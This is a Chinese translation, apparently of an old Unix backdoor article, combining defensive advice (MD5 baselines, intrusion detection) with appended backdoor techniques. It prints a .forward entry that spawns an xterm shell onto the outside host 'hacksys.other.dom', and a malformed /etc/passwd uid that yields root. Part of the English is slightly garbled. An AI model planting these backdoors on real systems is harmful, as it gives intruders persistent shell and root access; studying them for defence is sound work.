首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.
MD5基准线
一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.
入侵检测
随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.
从CD-ROM启动
一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.
警告
由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句该如何翻译? :( )
-------------------------------------------------------------------------
you may want to add:
.forward Backdoor
On Unix machines, placing mands into the .forward file was also
a mon method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most monly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary mands via
stdin (after minor preprocessing).
PS: The above method is also useful gaining access a panies
mailhub (assuming there is a shared a home directory FS on
&nbs>
the client and server).
> Using *** rsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).
你也许要增加:
.forward后门
Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username'的.forward可能设置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).>利用 *** rsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail>类程序, 很有可能还有问题 ......)
( 此段的内容理解不深, 故付上英文, 请指教! )
---------------------------------------------------------------------------
你也许能用这个"特性"做后门:
当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利.
例子:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh